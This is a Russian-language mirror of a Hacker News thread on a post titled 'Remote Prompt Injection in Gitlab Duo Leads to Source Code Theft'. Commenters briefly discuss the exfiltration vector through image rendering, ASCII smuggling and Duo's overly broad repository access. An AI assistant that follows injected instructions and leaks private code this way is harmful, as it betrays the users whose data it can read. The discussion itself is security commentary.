TE
ТехЭхо
ГлавнаяТоп за 24 часаНовейшиеЛучшиеВопросыПоказатьВакансии
GitHubTwitter
Главная

ТехЭхо

Платформа технологических новостей, созданная с использованием Next.js, предоставляющая глобальные технологические новости и обсуждения.

GitHubTwitter

Главная

ГлавнаяНовейшиеЛучшиеВопросыПоказатьВакансии

Ресурсы

HackerNews APIОригинальный HackerNewsNext.js

© 2025 ТехЭхо. Все права защищены.

Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

37 балловавтор: chillax2 дня назад

5 comments

cedws2 дня назад
Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
评论 #44071876 未加载
wunderwuzzi231 день назад
Great work!<p>Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it&#x27;s concerning that big vendors do not catch these before shipping.<p>I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.<p>GitHub Copilot Chat had a very similar bug last year.
nusl2 дня назад
GitLab&#x27;s remediation seems a bit sketchy at best.
评论 #44071508 未加载
mdaniel2 дня назад
Running Duo as a system user was crazypants and I&#x27;m sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform
aestetix1 день назад
Does that mean Gitlab Duo can run Doom?